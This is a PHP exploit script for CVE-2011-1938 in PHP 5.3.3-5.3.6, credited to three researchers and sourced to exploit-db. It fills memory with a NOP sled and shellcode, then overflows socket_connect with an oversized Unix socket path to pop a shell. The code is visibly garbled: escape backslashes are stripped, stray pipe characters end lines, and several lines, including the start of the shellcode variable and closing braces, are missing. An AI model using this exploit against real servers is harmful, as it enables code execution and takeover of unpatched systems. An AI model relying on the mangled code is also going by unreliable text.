<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian |
// Affected Versions: 5.3.3-5.3.6 |
echo "[+] CVE-2011-1938"; |
echo "[+] there we go...n"; |
define('EVIL_SPACE_ADDR', "xffxffxeexb3"); |
define('EVIL_SPACE_SIZE', 1024*1024*8); |
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0". |
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1". |
echo "[+] creating the sled.n"; |
$CODE = str_repeat("x90", EVIL_SPACE_SIZE); |
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; |
$i < strlen($SHELLCODE) ; $i++, $j++) { |
$CODE[$j] = $SHELLCODE[$i]; |
$b = str_repeat("A", 196).EVIL_SPACE_ADDR; |
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); |
echo "[+] popping shell, have fun (if you picked the right address...)n"; |
$var85 = socket_connect($var79,$b); |
?>
fonte: http://www.exploit-db.com/exploits/17318